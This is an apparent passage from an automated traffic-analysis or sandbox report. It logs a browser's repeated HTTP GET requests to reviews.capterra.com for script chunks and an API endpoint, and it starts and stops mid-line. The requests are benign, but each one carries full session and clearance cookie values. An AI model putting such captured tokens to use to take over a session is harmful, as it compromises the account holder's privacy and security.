OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/5430-253c90c823f8668d.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/framework-fb999dd119b6be4b.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/779-e50b3615e84c36b9.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/847-853074d4dea368fa.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/pages/products-search-269c80371465c95a.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/main-7ff3395b5b239e11.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/rlbEn55nmth45KPaQkAHZ/_buildManifest.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/6310-a55b4917884e40ce.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/rlbEn55nmth45KPaQkAHZ/_ssgManifest.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/630-a3c3b2c58b5440d6.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /api/v1/categories/targets?lang=en HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"traceparent: 00-00000000000000001887aea06bca0fdb-0234aca828d75b08-01sec-ch-ua-mobile: ?0x-gdm-source-site: Capterrax-datadog-origin: rumUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36x-datadog-sampling-priority: 1Accept: application/json, text/plain, */*x-datadog-trace-id: 1767573382792613851x-datadog-parent-id: 158941725104495368sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/5430-253c90c823f8668d.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/pages/_app-af44b767735d6640.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; 